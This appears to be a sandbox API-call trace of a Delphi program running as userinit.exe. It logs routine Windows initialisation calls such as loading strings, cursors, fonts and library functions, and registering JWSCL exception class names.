[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff09, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff08, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff07, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff06, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff05, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff04, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff03, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff02, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff01, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff00, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1f, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1e, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1d, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1c, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1b, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff1a, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff19, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff18, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff17, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff16, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff15, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff14, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff13, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff12, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff11, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff10, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff2f, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0190.557] LoadStringA (in: hInstance=0x2850000, uID=0xff2e, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0190.557] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0190.557] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0190.557] GetVersion () returned 0x1db10106
[0190.557] GetCurrentProcessId () returned 0x80c
[0190.557] GlobalAddAtomA (lpString="Delphi0000080C") returned 0xc0f8
[0190.557] GetCurrentThreadId () returned 0x810
[0190.557] GlobalAddAtomA (lpString="ControlOfs0285000000000810") returned 0xc0f2
[0190.557] RegisterClipboardFormatA (lpszFormat="ControlOfs0285000000000810") returned 0xc189
[0190.557] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0190.557] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0190.557] GetSystemMetrics (nIndex=19) returned 1
[0190.557] GetSystemMetrics (nIndex=75) returned 1
[0190.557] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2971320, fWinIni=0x0 | out: pvParam=0x2971320) returned 1
[0190.557] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0190.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0190.558] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ff9) returned 0x7011b
[0190.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0190.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0190.558] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0190.558] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ffa) returned 0x13022d
[0190.558] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ffb) returned 0x100229
[0190.558] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ffc) returned 0x11021d
[0190.558] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ffd) returned 0x110219
[0190.559] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7fff) returned 0x120217
[0190.559] LoadCursorA (hInstance=0x2850000, lpCursorName=0x7ffe) returned 0x110215
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0190.559] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0190.559] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0190.559] GetDC (hWnd=0x0) returned 0x68010872
[0190.559] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0190.559] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.559] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0190.559] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x28a9a60, dwData=0x297156c) returned 1
[0190.560] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x8f0cb, fWinIni=0x0 | out: pvParam=0x8f0cb) returned 1
[0190.560] CreateFontIndirectA (lplf=0x8f0cb) returned 0x9b0a088e
[0190.560] GetObjectA (in: h=0x9b0a088e, c=60, pv=0x8eebc | out: pv=0x8eebc) returned 60
[0190.560] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x8ef77, fWinIni=0x0 | out: pvParam=0x8ef77) returned 1
[0190.560] CreateFontIndirectA (lplf=0x8f053) returned 0xe20a0834
[0190.560] GetObjectA (in: h=0xe20a0834, c=60, pv=0x8eebc | out: pv=0x8eebc) returned 60
[0190.560] CreateFontIndirectA (lplf=0x8f017) returned 0x230a08a0
[0190.560] GetObjectA (in: h=0x230a08a0, c=60, pv=0x8eebc | out: pv=0x8eebc) returned 60
[0190.560] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0190.560] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8f02b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.560] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x8f02b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0190.561] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000
[0190.561] GetKeyboardLayoutList (in: nBuff=64, lpList=0x8efac | out: lpList=0x8efac) returned 1
[0190.562] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0190.562] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0190.562] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0190.562] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0190.562] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0190.562] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0190.563] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0190.563] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0190.564] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0190.564] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0190.564] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0190.564] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0190.564] LoadStringA (in: hInstance=0x2850000, uID=0xff59, lpBuffer=0x8ed0c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0190.564] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0190.564] LoadStringA (in: hInstance=0x2850000, uID=0xff5a, lpBuffer=0x8ed0c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0190.564] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0190.564] LoadStringA (in: hInstance=0x2850000, uID=0xff5b, lpBuffer=0x8ed0c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0190.564] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0190.564] LoadStringA (in: hInstance=0x2850000, uID=0xff5c, lpBuffer=0x8ed0c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0190.564] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0190.564] SetErrorMode (uMode=0x8000) returned 0x1
[0190.565] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d800000
[0190.567] SetErrorMode (uMode=0x1) returned 0x8000
[0190.567] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreatePropertyFrame") returned 0x6d8020ea
[0190.567] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreateFontIndirect") returned 0x6d8020b7
[0190.567] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreatePictureIndirect") returned 0x6d8020c8
[0190.567] GetProcAddress (hModule=0x6d800000, lpProcName="OleLoadPicture") returned 0x6d8020d9
[0190.567] SysReAllocStringLen (in: pbstr=0x293fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x293fa98*="EJwsclUnsupportedException") returned 1
[0190.567] SysReAllocStringLen (in: pbstr=0x293fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x293fa80*="EJwsclPIDException") returned 1
[0190.567] SysReAllocStringLen (in: pbstr=0x293fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x293fa68*="EJwsclJwShellExecuteException") returned 1
[0190.567] SysReAllocStringLen (in: pbstr=0x293fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x293fa50*="EJwsclShellExecuteException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x293fa38*="EJwsclElevationException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x293fa20*="EJwsclAbortException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x293fa08*="EJwsclSuRunErrorException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x293f9f0*="EJwsclElevateProcessException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x293f9d8*="EJwsclCertApiException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x293f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x293f9a8*="EJwsclInvalidStartupInfo") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x293f990*="EJwsclFirewallNoExceptionsException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x293f978*="EJwsclFirewallInactiveException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x293f960*="EJwsclFirewallDelRuleException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x293f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x293f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x293f918*="EJwsclFirewallAddRuleException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x293f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x293f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x293f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x293f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x293f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x293f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x293f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x293f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x293f840*="EJwsclGetFWStateException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x293f828*="EJwsclSetFWStateException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x293f810*="EJwsclFirewallProfileInitException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x293f7f8*="EJwsclFirewallInitException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x293f7e0*="EJwsclGenericFirewallException") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x293f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x293f7b0*="EJwsclInvalidRegistryPath") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x293f798*="EJwsclEndOfStream") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x293f780*="EJwsclClassTypeMismatch") returned 1
[0190.568] SysReAllocStringLen (in: pbstr=0x293f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x293f768*="EJwsclInvalidHandle") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x293f750*="EJwsclInvalidIndex") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x293f738*="EJwsclInvalidSession") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x293f720*="EJwsclMissingEvent") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x293f708*="EJwsclInvalidPointerType") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x293f6f0*="EJwsclCreateProcessFailed") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x293f6d8*="EJwsclNilPointer") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x293f6c0*="EJwsclUnimplemented") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x293f6a8*="EJwsclInitWellKnownException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x293f690*="EJwsclKeyApiException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x293f678*="EJwsclKeyException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x293f660*="EJwsclHashApiException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x293f648*="EJwsclHashException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x293f630*="EJwsclCSPApiException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x293f618*="EJwsclCSPException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x293f600*="EJwsclTerminalSessionException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x293f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x293f5d0*="EJwsclTerminalServiceException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x293f5b8*="EJwsclTerminalServerConnectException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x293f5a0*="EJwsclTerminalServerException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x293f588*="EJwsclCryptUnsupportedException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x293f570*="EJwsclCryptApiException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x293f558*="EJwsclCryptException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x293f540*="EJwsclOSError") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x293f528*="EJwsclResourceInitFailed") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x293f510*="EJwsclResourceUnequalCount") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x293f4f8*="EJwsclResourceNotFound") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x293f4e0*="EJwsclResourceException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x293f4c8*="EJwsclFailedAddACE") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x293f4b0*="EJwsclUnsupportedACE") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x293f498*="EJwsclOpenWindowStationException") returned 1
[0190.569] SysReAllocStringLen (in: pbstr=0x293f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x293f480*="EJwsclWindowStationException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x293f468*="EJwsclCloseDesktopException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x293f450*="EJwsclCreateDesktopException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x293f438*="EJwsclOpenDesktopException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x293f420*="EJwsclDesktopException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x293f408*="EJwsclSACLAccessDenied") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x293f3f0*="EJwsclAccessDenied") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x293f3d8*="EJwsclLSAException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x293f3c0*="ESetOwnerException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x293f3a8*="ESetSecurityException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x293f390*="EJwsclInvalidParentDescriptor") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x293f378*="EJwsclInvalidKeyPath") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x293f360*="EJwsclInvalidGenericAccessMask") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x293f348*="EJwsclAdaptSecurityInfoException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x293f330*="EJwsclThreadException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x293f318*="EJwsclInvalidObjectException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x293f300*="EJwsclSecurityObjectException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x293f2e8*="EJwsclHashMismatch") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x293f2d0*="EJwsclStreamHashException") returned 1
[0190.570] SysReAllocStringLen (in: pbstr=0x293f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x293f2b8*="EJwsclStreamInvalidMagicException") returned 1
